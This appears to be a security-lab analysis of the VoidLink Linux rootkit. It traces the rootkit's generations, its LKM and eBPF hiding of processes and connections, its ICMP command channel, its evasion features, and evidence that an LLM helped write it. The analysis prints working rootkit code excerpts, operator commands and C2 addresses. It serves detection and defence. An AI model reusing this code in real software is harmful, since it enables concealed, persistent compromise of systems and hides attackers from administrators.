<p>Check Point's second publication already established that VoidLink was developed through AI-driven workflows. The rootkit source code we analyzed corroborates and extends this finding: The source files are littered with phased refactoring annotations, tutorial-style comments that explain basic kernel concepts, and iterative version numbering patterns that closely mirror multi-turn AI conversations. Where Check Point observed the macro-level development methodology (sprint planning, specification-driven development), our data dump reveals the micro-level reality of how individual rootkit components were iteratively prompted, tested, and refined.</p>
<p>In this research publication, we walk through the rootkit's architecture, trace its evolution across four generations, dissect its most technically interesting features, and provide actionable detection strategies. All Chinese source comments referenced in this analysis have been translated into English.</p>
<h2>Discovery and initial triage</h2>
<p>At first glance, the sheer volume of files, many with iterative version numbers, like <code>hide_ss_v3.bpf.c</code> through <code>hide_ss_v9.bpf.c</code>, suggested an active development effort rather than a one-off project. The presence of compiled <code>.ko</code> files for specific kernel versions, alongside three separate copies of <code>vmlinux.h</code> BPF Type Format (BTF) headers, confirmed that this code had been built and tested on real systems.</p>
<p>After sorting through the dump, we identified seven logical groupings. Three stand-alone LKM variants in the root directory targeted different kernel generations: <code>stealth_centos7_v2.c</code> (1,148 lines, targeting CentOS 7's kernel 3.10), <code>stealth_kernel5x.c</code> (767 lines, targeting kernel 5.x), and <code>stealth_v5.c</code> (876 lines, the &quot;Ultimate Stealth&quot; variant with delayed initialization). Two production directories, <code>kernel5x_new/</code> and <code>lkm_5x/</code>, contained polished variants with module parameters, eBPF companions, and versioned ICMP control scripts. An <code>ebpf_test/</code> directory contained 10 sequential iterations of ss-hiding eBPF programs and six versions of process-hiding programs, each building on the last, providing a clear record of iterative development. Finally, <code>load_lkm.sh</code> provided boot-time persistence with a particularly interesting feature: It scanned <code>/proc/*/exe</code> for processes running from <code>memfd</code> file descriptors, a telltale sign of fileless implants.</p>
<p>Every source file was annotated entirely in Simplified Chinese. The comments ranged from straightforward function descriptions to detailed phase-numbered fix annotations. For example, the CentOS 7 variant's header contained a structured changelog that mapped perfectly to five development phases, translated here:</p>
<pre><code class="language-text">Phase 1: Security/logic vulnerabilities - bounds checking, UDP ports, memory leaks, byte order
Phase 2: Stealth enhancements - ICMP randomization, /proc/modules, kprobe hiding, log cleanup
Phase 3: Compatibility - dynamic symbol lookup, struct offsets, IPv6, kernel version adaptation
Phase 4: Stability - maxactive, RCU protection, priority, error handling
Phase 5: Defense mechanisms - anti-debugging, self-destruct, dynamic configuration
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/image2.png" alt="CentOS rootkit header" title="Source code header showing version and fix notes for a CentOS 7 stealth rootkit." /></p>
<p>Individual fixes throughout the code were tagged with identifiers like <code>[1.1]</code>, <code>[2.1]</code>, <code>[3.3]</code>, and <code>[5.2]</code>, each corresponding to a specific phase and fix number. We’ll return to the significance of this annotation pattern later, as it provides compelling evidence about the rootkit's development methodology.</p>
<p>The operator scripts revealed real infrastructure. The <code>icmp_ctl.py</code> usage examples referenced two Alibaba Cloud IP addresses, <code>8.149.128[.]10</code> and <code>116.62.172[.]147</code>, indicating that VoidLink was being used operationally against targets accessible from Chinese cloud infrastructure. The <code>load_lkm.sh</code> boot script hard-codes a path to <code>/root/kernel5x_new/vl_stealth.ko</code> and configures port <code>8080</code> to be hidden by default, further suggesting active deployment.</p>
<h2>Architecture: A hybrid approach</h2>
<p>What makes VoidLink architecturally notable is its two-component design. Most Linux rootkits rely on a single mechanism for hiding, whether that’s an LKM hooking syscalls, an eBPF program attached to tracepoints, or a shared object injected via <code>LD_PRELOAD</code>. VoidLink uses both an LKM and an eBPF program, each handling the task for which it is best suited. This hybrid approach is rarely seen in the wild and reflects a deliberate engineering decision.</p>
<p>The LKM component, which masquerades under the module name <code>vl_stealth</code> (or, in some variants, <code>amd_mem_encrypt</code>), is the backbone of the rootkit. It handles tasks that require deep kernel access: process hiding via <code>getdents64</code> syscall hooking, file and module trace removal via <code>vfs_read</code> filtering, network connection hiding via <code>seq_show</code> kretprobes, and the ICMP-based command-and-control channel via Netfilter hooks. These operations require manipulating kernel-internal data structures and intercepting kernel functions at a level that only a loaded kernel module can achieve.</p>
<p>The eBPF component handles a single but critical task: hiding network connections from the <code>ss</code> utility. The <code>ss</code> command doesn’t read from <code>/proc/net/tcp</code> as <code>netstat</code> does. Instead, it uses Netlink sockets with the <code>SOCK_DIAG_BY_FAMILY</code> protocol to query the kernel's socket diagnostic interface directly. This means that the kretprobe technique used to hide connections from <code>netstat</code>, which works by rolling back the <code>seq_file</code> output counter, has no effect on <code>ss</code>.</p>
<p>The developers initially attempted to hide connections from <code>ss</code> using a kretprobe on <code>inet_sk_diag_fill</code>, returning <code>-EAGAIN</code> to suppress individual entries. A comment in the source code, translated from Chinese, explains why they abandoned this approach: &quot;ss command hiding implemented by eBPF module (more stable)&quot;. The kretprobe method caused kernel instability, likely because <code>inet_sk_diag_fill</code> is called deep within the Netlink socket processing path, and returning an error code there could corrupt the response chain.</p>
<p>The eBPF solution is elegant. It hooks <code>__sys_recvmsg</code> using a kprobe at the entry point and a kretprobe at the return point. On entry, it captures the userspace receive buffer address from the <code>msghdr</code> structure. On return, it walks the chain of <code>nlmsghdr</code> structures in that buffer, checking each <code>SOCK_DIAG_BY_FAMILY</code> message for hidden source or destination ports. When it finds a match, rather than removing the entry (which would corrupt the Netlink message chain), it extends the previous message's <code>nlmsg_len</code> field to absorb the hidden entry. The <code>ss</code> parser then treats the hidden entry as padding within the previous message and silently skips it. This &quot;swallowing&quot; technique, implemented through <code>bpf_probe_write_user</code>, is a creative abuse of a BPF helper originally intended for debugging.</p>
<h2>Version evolution</h2>
<p>VoidLink evolved through at least four generations, each one adapting to newer kernel defenses while expanding the rootkit's capabilities. Tracing this evolution reveals not only the technical challenges the developers faced but also the iterative problem-solving approach, likely aided by a large language model (LLM) that defines this rootkit's development history.</p>
<h3>Generation 1: The CentOS 7 foundation</h3>
<p>The earliest variant, <code>stealth_centos7_v2.c</code>, targets CentOS 7 and its venerable 3.10 kernel. At 1,148 lines, it’s the longest file and contains the most extensive comments. This variant uses the oldest and most straightforward hooking technique available to LKM rootkits: direct modification of the syscall table.</p>
<p>On kernel 3.10, <code>kallsyms_lookup_name()</code> is still exported as a public kernel symbol, so locating the <code>sys_call_table</code> is trivial. The rootkit calls it directly to resolve function addresses. However, the kernel marks the syscall table as read-only, so modifying it requires temporarily disabling the processor's write protection bit in the <code>CR0</code> control register:</p>
<pre><code class="language-c">write_cr0(read_cr0() &amp; ~X86_CR0_WP);  // Disable write protection
sys_call_table[__NR_getdents64] = (unsigned long)hooked_getdents64;
sys_call_table[__NR_getdents] = (unsigned long)hooked_getdents;
write_cr0(read_cr0() | X86_CR0_WP);   // Re-enable write protection
</code></pre>
<p>This is a well-known technique with a long history in Linux rootkit development. More interestingly, how does the CentOS 7 variant handle GCC's interprocedural optimizations? When GCC inlines or clones functions, it renames them with suffixes like <code>.isra.0</code>, <code>.constprop.5</code>, or <code>.part.3</code>. This means a symbol like <code>tcp4_seq_show</code> might actually exist in the kernel as <code>tcp4_seq_show.isra.2</code>. VoidLink's <code>find_symbol_flexible()</code> function handles this by brute-forcing up to 20 variants of each suffix:</p>
<pre><code class="language-c">static unsigned long find_symbol_flexible(const char *base_name)
{
    unsigned long addr;
    char buf[128];
    int i;

    addr = kallsyms_lookup_name(base_name);
    if (addr) return addr;

    for (i = 0; i &lt;= 20; i++) {
        snprintf(buf, sizeof(buf), &quot;%s.isra.%d&quot;, base_name, i);
        addr = kallsyms_lookup_name(buf);
        if (addr) return addr;
    }

    for (i = 0; i &lt;= 20; i++) {
        snprintf(buf, sizeof(buf), &quot;%s.constprop.%d&quot;, base_name, i);
        addr = kallsyms_lookup_name(buf);
        if (addr) return addr;
    }

    return 0;
}
</code></pre>
<p>Anyone who has developed kernel modules for CentOS 7 will recognize the frustration of symbols being renamed by compiler optimizations. The fact that VoidLink handles this systematically, across <code>.isra</code>, <code>.constprop</code>, and <code>.part</code> suffixes, suggests the developers encountered this problem during real-world deployment.</p>
<p>The CentOS 7 variant hooks both <code>getdents</code> and <code>getdents64</code> syscalls, because CentOS 7 userspace tools use both 32-bit and 64-bit directory entry formats. The <code>/proc/modules</code> file is handled separately by replacing the <code>seq_operations.show</code> function pointer after opening the file through <code>filp_open()</code>. This generation also introduces the anti-debugging timer and the self-destruct command, features that persist through all subsequent generations. One notable detail: The variant suppresses all kernel log output by redefining <code>pr_info</code>, <code>pr_err</code>, and <code>pr_warn</code> as no-ops, a simple but effective anti-forensics measure.</p>
<h3>Generation 2: Adapting to kernel 5.x</h3>
<p>The jump from CentOS 7's kernel 3.10 to kernel 5.x required fundamental changes to VoidLink's hooking strategy. Two kernel developments forced the developers' hand: <code>kallsyms_lookup_name()</code> was unexported starting in kernel 5.7, and the syscall table gained stronger write protections through <code>CONFIG_STRICT_KERNEL_RWX</code>.</p>
<p>The second generation, found in <code>stealth_kernel5x.c</code> and <code>lkm_test/main.c</code>, addresses the first problem with a technique known in rootkit development circles as the <em>kprobe trick</em>. Instead of calling <code>kallsyms_lookup_name()</code> directly, the rootkit registers a kprobe on it. The kernel's kprobe subsystem resolves the symbol address internally during registration and stores it in the <code>kp.addr</code> field. The rootkit reads this address and then immediately unregisters the kprobe:</p>
<pre><code class="language-c">static int init_symbols(void)
{
    struct kprobe kp = { .symbol_name = &quot;kallsyms_lookup_name&quot; };
    if (register_kprobe(&amp;kp) &lt; 0)
        return -EFAULT;
    kln_func = (kln_t)kp.addr;
    unregister_kprobe(&amp;kp);
    return kln_func ? 0 : -EFAULT;
}
</code></pre>
<p>This trick was first popularized by modern rootkits, like Diamorphine, and has become the de facto method for symbol resolution on post–5.7 kernels. Once <code>kallsyms_lookup_name</code> is available, the rootkit can resolve any other kernel symbol it needs.</p>
<p>For syscall hooking, Generation 2 abandons direct modification of the syscall table in favor of ftrace. The Linux kernel's function tracing framework was designed for performance analysis and debugging, but it provides a convenient API for attaching callbacks to arbitrary kernel functions. VoidLink registers ftrace hooks on <code>__x64_sys_getdents64</code> and <code>vfs_read</code>, using <code>FTRACE_OPS_FL_SAVE_REGS</code> and <code>FTRACE_OPS_FL_IPMODIFY</code> flags to gain full control over the hooked function's execution. The ftrace callback modifies the instruction pointer in the saved register state, redirecting execution to the rootkit's handler before the original function runs.</p>
<p>This generation also introduces <code>vfs_read</code> hooking to filter sensitive pseudo-files. When a process reads <code>/proc/kallsyms</code>, <code>/proc/modules</code>, or <code>/sys/kernel/debug/kprobes/list</code>, the rootkit intercepts the output buffer and removes any lines containing the module name or kretprobe registrations. This is a significant improvement over the CentOS 7 variant's approach of hooking <code>seq_operations.show</code> for a single file; the <code>vfs_read</code> hook provides a centralized filtering mechanism for all sensitive files.</p>
<h3>Generation 3: Production readiness</h3>
<p>The third generation, found in <code>kernel5x_new/</code> and <code>lkm_5x/</code>, represents the production-ready form of VoidLink. The most visible change is the addition of module parameters that allow the operator to configure the rootkit at load time without needing the ICMP channel:</p>
<pre><code class="language-shell">insmod vl_stealth.ko init_pids=1234 init_ports=8080 stealth=1
</code></pre>
<p>The <code>init_pids</code> parameter specifies process IDs to hide immediately after loading. The <code>init_ports</code> parameter lists ports to hide from <code>netstat</code> and <code>ss</code>. The <code>stealth</code> flag controls whether the module removes itself from the kernel's module list upon initialization. These parameters eliminate the need for a separate ICMP command to configure the rootkit after it loads, thereby reducing the window of vulnerability between module insertion and activation.</p>
<p>This generation also doubles the number of ICMP hook registrations by attaching to both the <code>NF_INET_PRE_ROUTING</code> and <code>NF_INET_LOCAL_IN</code> Netfilter chains. The dual registration ensures reliable command reception, regardless of the host's network configuration and iptables rules. Most rootkits register on only one Netfilter chain; VoidLink's dual approach demonstrates an awareness of operational failures that could occur in diverse network environments.</p>
<p>The most important change in Generation 3 is the delegation of <code>ss</code> hiding to the eBPF companion, which we will examine in detail shortly.</p>
<h2>The eBPF innovation: Hiding from ss</h2>
<p>One of the most technically interesting aspects of VoidLink is how it hides network connections from the <code>ss</code> utility. This problem has historically been a challenge for Linux rootkits because <code>ss</code> and <code>netstat</code> query the kernel through entirely different interfaces, meaning a rootkit that defeats one often fails against the other.</p>
<p>The <code>netstat</code> utility reads from <code>/proc/net/tcp</code>, <code>/proc/net/tcp6</code>, <code>/proc/net/udp</code>, and similar pseudo-files. The kernel generates these files via <code>seq_file</code> operations, calling functions such as <code>tcp4_seq_show()</code> for each socket entry. Hiding a connection from <code>netstat</code> is straightforward: Install a kretprobe on the relevant <code>seq_show</code> function and, when it returns, check whether the source or destination port matches a hidden port. If it does, roll back the <code>seq_file-&gt;count</code> counter to its pre-call value, effectively erasing the line from the output. VoidLink's LKM component uses exactly this approach for <code>netstat</code> hiding, and it works reliably.</p>
<p>The <code>ss</code> utility, however, uses the <code>SOCK_DIAG_BY_FAMILY</code> Netlink interface to query socket information directly from the kernel. The response arrives as a chain of Netlink messages (<code>nlmsghdr</code> structures), each containing an <code>inet_diag_msg</code> with socket details. This is a completely different data path from <code>/proc/net/tcp</code>, and the <code>seq_show</code> kretprobes don’t affect it.</p>
<p>The <code>ebpf_test/</code> directory tells the story of VoidLink's developers struggling to solve this problem. We found 10 sequential versions of <code>hide_ss.bpf.c</code> (v1 through v9, plus a &quot;final&quot; and &quot;full&quot; variant), each one attempting a different approach. The early versions tried to modify Netlink messages in kernel space, which proved unreliable. The later versions converged on the &quot;swallowing&quot; strategy used by the production variant.</p>
<p>The production eBPF program is located in <code>lkm_5x/ebpf/hide_ss.bpf.c</code> and hooks <code>__sys_recvmsg</code> at both entry and return. On entry, it captures the userspace buffer address from the <code>msghdr-&gt;msg_iov</code> chain:</p>
<pre><code class="language-c">SEC(&quot;kprobe/__sys_recvmsg&quot;)
int kprobe_recvmsg(struct pt_regs *regs)
{
    __u32 k = 0;
    __u8 *e = bpf_map_lookup_elem(&amp;enabled, &amp;k);
    if (!e || !*e)
        return 0;

    void *msg = (void *)regs-&gt;si;
    if (!msg)
        return 0;

    void *msg_iov;
    struct iovec iov;
    if (bpf_probe_read_user(&amp;msg_iov, 8, msg + 16) &lt; 0 || !msg_iov)
        return 0;
    if (bpf_probe_read_user(&amp;iov, sizeof(iov), msg_iov) &lt; 0 || !iov.iov_base)
        return 0;

    __u64 id = bpf_get_current_pid_tgid();
    struct rctx_data d = { .buf = iov.iov_base, .len = iov.iov_len };
    bpf_map_update_elem(&amp;recvmsg_ctx, &amp;id, &amp;d, BPF_ANY);
    return 0;
}
</code></pre>
<p>The buffer address and length are stored in a per-thread BPF hash map (<code>recvmsg_ctx</code>), keyed by the thread's PID/TID combination. This allows the return hook to retrieve the buffer address, even though it’s no longer available in the register state at function return.</p>
<p>The return hook is where the actual hiding occurs. After verifying that the <code>recvmsg</code> call succeeded, it walks the Netlink message chain in the userspace buffer:</p>
<pre><code class="language-c">SEC(&quot;kretprobe/__sys_recvmsg&quot;)
int kretprobe_recvmsg(struct pt_regs *regs)
{
    // ... setup and validation ...

    void *buf = d-&gt;buf;
    long offset = 0;
    long prev_offset = -1;
    __u32 prev_len = 0;

    #pragma unroll
    for (int i = 0; i &lt; 32; i++) {
        if (offset &gt;= ret || offset + NLMSG_HDRLEN &gt; ret)
            break;

        __u32 nlmsg_len;
        __u16 nlmsg_type;
        bpf_probe_read_user(&amp;nlmsg_len, 4, buf + offset);
        bpf_probe_read_user(&amp;nlmsg_type, 2, buf + offset + 4);

        int should_hide = 0;
        if (nlmsg_type == SOCK_DIAG_BY_FAMILY) {
            void *payload = buf + offset + NLMSG_HDRLEN;
            __u16 sport, dport;

            if (bpf_probe_read_user(&amp;sport, 2, payload + SPORT_OFF) == 0 &amp;&amp;
                bpf_probe_read_user(&amp;dport, 2, payload + DPORT_OFF) == 0) {

                sport = bpf_ntohs(sport);
                dport = bpf_ntohs(dport);

                if (bpf_map_lookup_elem(&amp;hidden_ports, &amp;sport) != NULL ||
                    bpf_map_lookup_elem(&amp;hidden_ports, &amp;dport) != NULL) {
                    should_hide = 1;
                }
            }
        }

        if (should_hide) {
            if (prev_offset &gt;= 0) {
                __u32 new_len = prev_len + nlmsg_len;
                bpf_probe_write_user(buf + prev_offset, &amp;new_len, 4);
            }
        } else {
            prev_offset = offset;
            prev_len = nlmsg_len;
        }

        offset += NLMSG_ALIGN(nlmsg_len);
    }
    // ...
}
</code></pre>
<p>For each Netlink message of type <code>SOCK_DIAG_BY_FAMILY</code>, the program reads the source and destination ports from fixed offsets within the <code>inet_diag_msg</code> payload (offsets 4 and 6, respectively). If either port matches an entry in the <code>hidden_ports</code> BPF map, the message is &quot;swallowed&quot; by extending the previous message's <code>nlmsg_len</code> to include the current message's length. The <code>bpf_probe_write_user()</code> call modifies the four-byte <code>nlmsg_len</code> field directly in the userspace buffer.</p>
<p>This technique works because Netlink parsers, including the one in <code>ss</code>, advance through the message chain using <code>NLMSG_NEXT()</code>, which calculates the next message offset from the current message's <code>nlmsg_len</code>. By inflating the previous message's length, the hidden message falls within the body of the previous message and is never parsed as a separate entry.</p>
<p>The same &quot;swallowing&quot; technique appears in the process-hiding experiments in the <code>ebpf_test/directory</code>. <code>hide_proc_v4.bpf.c</code> applies the identical approach to <code>getdents64</code>, extending the previous directory entry's <code>d_reclen</code> to absorb the hidden entry. This shows the developers recognized the pattern's general applicability and experimented with applying it beyond network hiding. We do note that process hiding via eBPF was ultimately handled by the LKM's ftrace hook in the production variant, likely because the LKM approach was more reliable for the larger and more variable <code>getdents64</code> buffers.</p>
<h2>The ICMP covert channel</h2>
<p>Every VoidLink variant includes an ICMP-based command-and-control channel that leaves no listening ports, no filesystem artifacts, and, by design, no ICMP replies. The operator sends specially crafted ICMP Echo Request packets to the target host, and the rootkit's Netfilter hook intercepts them before the kernel's normal ICMP processing can generate a response. Commands are processed silently, and the packet is dropped.</p>
<p>The ICMP command protocol uses a simple but effective structure. The rootkit identifies its own traffic by checking the <code>echo.id</code> field in the ICMP header for a magic value, <code>0xC0DE</code>, by default. When a matching packet arrives, the rootkit extracts a 64-byte <code>icmp_cmd</code> structure from the payload:</p>
<pre><code class="language-c">struct icmp_cmd {
    u8 cmd;           // Command byte
    u8 len;           // Length of data
    u8 data[62];      // XOR-encrypted payload
} __attribute__((packed));
</code></pre>
<p>The <code>data</code> field is XOR-encrypted with a single-byte key, <code>0x42</code> by default. While XOR with a known key is trivially reversible, it serves its purpose: preventing casual network monitoring tools from reading commands in cleartext without requiring the overhead of proper cryptography.</p>
<p>The command set evolved across generations. The production variant (v5) supports 10 distinct commands, ranging from hiding processes and ports to privilege escalation and self-destruction. The <code>GIVE_ROOT</code> command (<code>0x11</code>) is noteworthy: It takes a target PID as an argument and uses <code>prepare_creds()</code>/<code>commit_creds()</code> to set all UID and GID fields to zero for that process, effectively granting it root privileges without any authentication mechanism:</p>
<pre><code class="language-c">case ICMP_CMD_GIVE_ROOT:
    if (cmd-&gt;len &gt;= 4) {
        u32 target_pid;
        memcpy(&amp;target_pid, cmd-&gt;data, 4);
        give_root_to_pid(target_pid);
    }
    break;
</code></pre>
<p>The operator interacts with the rootkit through a Python script, <code>icmp_ctl.py</code>, which constructs and sends the ICMP packets using raw sockets. The v5 version of this script provides a clean command line interface (CLI):</p>
<pre><code class="language-shell">./icmp_ctl.py 192.168.1.100 hide_pid 1234
./icmp_ctl.py 192.168.1.100 hide_port 8080
./icmp_ctl.py 192.168.1.100 hide_ip 10.0.0.50
./icmp_ctl.py 192.168.1.100 root 5678
./icmp_ctl.py 192.168.1.100 destruct
</code></pre>
<p>One aspect that distinguishes VoidLink's C2 from simpler rootkit implementations is runtime key rotation. The <code>SET_KEY</code> command (<code>0x20</code>) allows the operator to change both the ICMP magic identifier and the XOR key at runtime:</p>
<pre><code class="language-c">case ICMP_CMD_SET_KEY:
    if (cmd-&gt;len &gt;= 3) {
        u16 new_magic;
        u8 new_key;
        memcpy(&amp;new_magic, cmd-&gt;data, 2);
        new_key = cmd-&gt;data[2];
        g_config.icmp_magic = new_magic;
        g_config.icmp_key = new_key;
    }
    break;
</code></pre>
<p>After rotation, all subsequent commands must use the new magic and key values. This means that even if a defender discovers the initial <code>0xC0DE</code> signature through network monitoring, the operator can switch to a new value and continue operating. The v2 version of <code>icmp_ctl.py</code> even includes a probe mode that iterates through a list of common magic values (<code>0xC0DE</code>, <code>0xDEAD</code>, <code>0xBEEF</code>, <code>0xCAFE</code>, <code>0xFACE</code>), sending a <code>SHOW_MOD</code> command with each one to rediscover a rootkit whose credentials were rotated by a previous operator.</p>
<p>The CentOS 7 variant additionally supports compile-time magic randomization through a <code>CONFIG_RANDOM_MAGIC</code> flag, which generates unique magic and key values at build time using the kernel's random number generator. This would give each deployed instance a unique C2 signature, further complicating network-based detection.</p>
<p>From a detection perspective, the ICMP channel has one significant weakness: all command packets are silently dropped (<code>NF_DROP</code>), meaning that legitimate ICMP Echo Requests to the host will receive replies, while rootkit commands will not. A network monitoring system that correlates ICMP Echo Requests with their corresponding Echo Replies would notice the anomaly of unanswered pings.</p>
<h2>Advanced evasion techniques</h2>
<p>Beyond its core hiding capabilities, VoidLink employs several advanced evasion techniques that suggest awareness of modern endpoint detection and response (EDR) behavior and forensic investigation methods. These features are concentrated in the latest &quot;Ultimate Stealth v5&quot; variant (<code>stealth_v5.c</code>), but some appear across all generations.</p>
<h3>Delayed initialization</h3>
<p>Most rootkits install their hooks immediately during <code>module_init()</code>. This means that any security tool monitoring module that loads, whether it checks for new kprobes, ftrace hooks, or syscall table modifications, can detect the rootkit at the time of insertion. VoidLink's v5 variant counters this by deferring all hook installation by three seconds:</p>
<pre><code class="language-c">static int __init mod_init(void)
{
    if (init_symbols() != 0)
        return -EFAULT;
    schedule_delayed_work(&amp;init_work, msecs_to_jiffies(3000));
    return 0;
}
</code></pre>
<p>The <code>mod_init()</code> function resolves a single symbol (<code>kallsyms_lookup_name</code> via the kprobe trick) and then returns success. The module appears loaded and benign, with no hooks, no Netfilter registrations, and no kretprobes. Three seconds later, <code>delayed_init()</code> fires, installing all nine ftrace hooks, registering the Netfilter ICMP handler, starting the anti-debugging timer, and removing the module from the kernel's module list.</p>
<p>This technique evades security tools that scan for suspicious module behavior in response to module-loading events. By the time the hooks are active, the initial security scan has already completed and may have marked the module as clean. The three-second delay is short enough to be operationally invisible but long enough to outlast any reasonable synchronous security check.</p>
<h3>Anti-debugging and anti-forensics</h3>
<p>VoidLink implements an active anti-forensics capability that is uncommon among Linux rootkits. While Windows malware frequently checks for debugging tools, Linux rootkits rarely implement runtime detection of forensic utilities. VoidLink's approach uses a kernel timer that fires every five seconds and iterates over the entire process list:</p>
<pre><code class="language-c">static const char *debug_tools[] = {
    &quot;strace&quot;, &quot;ltrace&quot;, &quot;gdb&quot;, &quot;perf&quot;, &quot;bpftool&quot;,
    &quot;bpftrace&quot;, &quot;systemtap&quot;, &quot;crash&quot;, &quot;kdb&quot;, &quot;trace-cmd&quot;,
    &quot;ftrace&quot;, &quot;sysdig&quot;, &quot;dtrace&quot;, NULL
};

static void anti_debug_scan(struct timer_list *t)
{
    struct task_struct *task;
    bool detected = false;

    rcu_read_lock();
    for_each_process(task) {
        if (is_debug_tool(task-&gt;comm)) {
            detected = true;
            break;
        }
    }
    rcu_read_unlock();

    if (detected &amp;&amp; !g_data.debug_detected) {
        g_data.debug_detected = true;
    } else if (!detected &amp;&amp; g_data.debug_detected) {
        g_data.debug_detected = false;
    }

    mod_timer(&amp;anti_debug_timer,
              jiffies + msecs_to_jiffies(ANTI_DEBUG_INTERVAL));
}
</code></pre>
<p>The tool list is comprehensive: It covers standard debugging tools (<code>strace</code>, <code>gdb</code>, <code>ltrace</code>), performance analysis utilities (<code>perf</code>, <code>trace-cmd</code>, <code>sysdig</code>), eBPF inspection tools (<code>bpftool</code>, <code>bpftrace</code>), and rootkit detection utilities (<code>rkhunter</code>, <code>chkrootkit</code> in the CentOS 7 variant). The scan uses <code>for_each_process()</code> under read-copy-update (RCU) lock protection, checking each task's <code>comm</code> field against the tool list. When a debugging tool is detected, the <code>debug_detected</code> flag is set. The CentOS 7 variant goes further: It can optionally pause all hiding operations or trigger self-destruction when forensic tools are detected.</p>
<h3>Module masquerading</h3>
<p>Every VoidLink variant disguises its kernel module metadata to impersonate a legitimate AMD driver:</p>
<pre><code class="language-c">MODULE_LICENSE(&quot;GPL&quot;);
MODULE_AUTHOR(&quot;Advanced Micro Devices, Inc.&quot;);
MODULE_DESCRIPTION(&quot;AMD Memory Encryption Support&quot;);
MODULE_VERSION(&quot;3.0&quot;);
</code></pre>
<p>The real <code>amd_mem_encrypt</code> module is a legitimate part of <a href="https://www.amd.com/en/developer/sev.html">AMD's Secure Memory Encryption (SME) and Secure Encrypted Virtualization (SEV)</a> support in the Linux kernel. By copying its metadata, VoidLink makes its <code>modinfo</code> output indistinguishable from the real driver. This disguise is particularly effective on cloud instances and virtual machines, where AMD-related kernel modules are commonly present and rarely questioned.</p>
<p>The v5 variant takes this further by XOR-encrypting the module name string and decoding it at runtime:</p>
<pre><code class="language-c">static char obf_modname[] = {
    'a'^ICMP_KEY, 'm'^ICMP_KEY, 'd'^ICMP_KEY, '_'^ICMP_KEY,
    'm'^ICMP_KEY, 'e'^ICMP_KEY, 'm'^ICMP_KEY, '_'^ICMP_KEY,
    'e'^ICMP_KEY, 'n'^ICMP_KEY, 'c'^ICMP_KEY, 'r'^ICMP_KEY,
    'y'^ICMP_KEY, 'p'^ICMP_KEY, 't'^ICMP_KEY, 0
};

static void decrypt_string(char *dst, const char *src, u8 key)
{
    while (*src) { *dst++ = *src++ ^ key; }
    *dst = 0;
}
</code></pre>
<p>This prevents simple string scanning of the compiled <code>.ko</code> binary from revealing the disguise name. While the XOR key (<code>0x42</code>) is trivially discoverable, the obfuscation adds a layer that defeats basic <code>strings</code> or <code>grep</code> analysis.</p>
<h3>Process protection</h3>
<p>The v5 variant introduces kill protection for designated processes. By hooking <code>do_send_sig_info</code> via ftrace, the rootkit intercepts all signal deliveries and silently discards lethal signals sent to protected PIDs:</p>
<pre><code class="language-c">if (chk_protected(p-&gt;pid)) {
    if (sig == SIGKILL || sig == SIGTERM || sig == SIGSTOP ||
        sig == SIGINT || sig == SIGHUP || sig == SIGQUIT) {
        return 0;  // Pretend success but don't deliver
    }
}
</code></pre>
<p>The intercepted signals include <code>SIGKILL</code>, <code>SIGTERM</code>, <code>SIGSTOP</code>, <code>SIGINT</code>, <code>SIGHUP</code>, and <code>SIGQUIT</code>, covering all common methods an administrator might use to terminate or suspend a process. The hook returns zero (success) to the caller, making the caller believe that the signal was delivered, when it was actually discarded. Additionally, signals sent to hidden (but not specifically protected) processes return <code>-ESRCH</code> (&quot;No such process&quot;), maintaining the illusion that the process doesn’t exist.</p>
<h3>The memfd-aware boot loader</h3>
<p>The <code>load_lkm.sh</code> script reveals that VoidLink is designed to operate as part of a larger attack toolkit. Before loading the rootkit, the script scans <code>/proc/*/exe</code> for any process running from a <code>memfd</code> file descriptor:</p>
<pre><code class="language-shell">for pid in $(ls /proc 2&gt;/dev/null | grep -E &quot;^[0-9]+$&quot;); do
    exe=$(readlink /proc/$pid/exe 2&gt;/dev/null)
    if [[ &quot;$exe&quot; == *&quot;memfd&quot;* ]]; then
        IMPLANT_PIDS=&quot;$IMPLANT_PIDS $pid&quot;
    fi
done
</code></pre>
<p>A <code>memfd</code> file descriptor, created by <code>memfd_create()</code>, represents an anonymous in-memory file with no on-disk backing. Processes running from <code>memfd</code> are a strong indicator of <em>fileless implants</em>: that is, malware that exists only in memory and leaves no file on the filesystem. The boot script automatically passes any discovered <code>memfd</code> process PIDs to the rootkit as <code>init_pids</code>, ensuring that they’re hidden immediately upon rootkit activation.</p>
<p>This integration tells us that VoidLink isn’t a stand-alone tool. It’s designed to complement a separate fileless implant, likely a reverse shell or beacon, that the operator deploys first. The rootkit's job is to make that implant invisible to administrators and security tools.</p>
<h2>Evidence of LLM-assisted development</h2>
<p>Check Point Research's <a href="https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/">second publication on VoidLink</a> established that the broader framework was built using AI-driven development through the TRAE IDE, with sprint-planning documents, coding guidelines, and structured specifications all generated by an LLM. The rootkit source code in our data dump independently corroborates this finding and provides additional granular evidence at the code level. While the rootkit's technical sophistication is genuine, the patterns in its source code, comments, and development history offer a ground-level view of how LLM-assisted iteration produced kernel-level malware.</p>
<p>The most compelling evidence comes from the phase-numbered refactoring annotations in the CentOS 7 variant. The file header contains a structured changelog that reads like a series of LLM conversation turns: &quot;Fix the security issues&quot; (Phase 1), &quot;Now improve stealth&quot; (Phase 2), &quot;Add compatibility&quot; (Phase 3), &quot;Improve stability&quot; (Phase 4), &quot;Add defense mechanisms&quot; (Phase 5). Individual code changes are tagged throughout with identifiers like <code>[1.1]</code> for the first fix in Phase 1, <code>[2.3]</code> for the third fix in Phase 2, and so on. This systematic tagging matches the pattern of iterative LLM prompting, where a user requests a category of improvements and the model implements and numbers each one.</p>
<p>The comment style throughout VoidLink is tutorial-like in a way that experienced kernel developers wouldn’t produce. Consider this annotation on a single XOR decryption loop:</p>
<pre><code class="language-c">// XOR decryption
for (i = 0; i &lt; cmd-&gt;len; i++)
    cmd-&gt;data[i] ^= g_config.icmp_key;
</code></pre>
<p>An experienced kernel developer wouldn’t annotate a three-line XOR loop with a comment explaining that it performs XOR decryption. This kind of pedagogical annotation is characteristic of LLM output, where the model explains every step for the user's benefit, regardless of its obviousness.</p>
<p>Every source file in the dump uses the same Unicode box-drawing header (<code>═══</code>) to separate sections. This decorative formatting is a hallmark of LLM-generated code. Human kernel developers almost universally use simple <code>/* */</code> or <code>//</code> comment blocks for section headers. The consistency of this formatting across files written at different times and for different kernel versions suggests that each file was generated or heavily modified by the same LLM.</p>
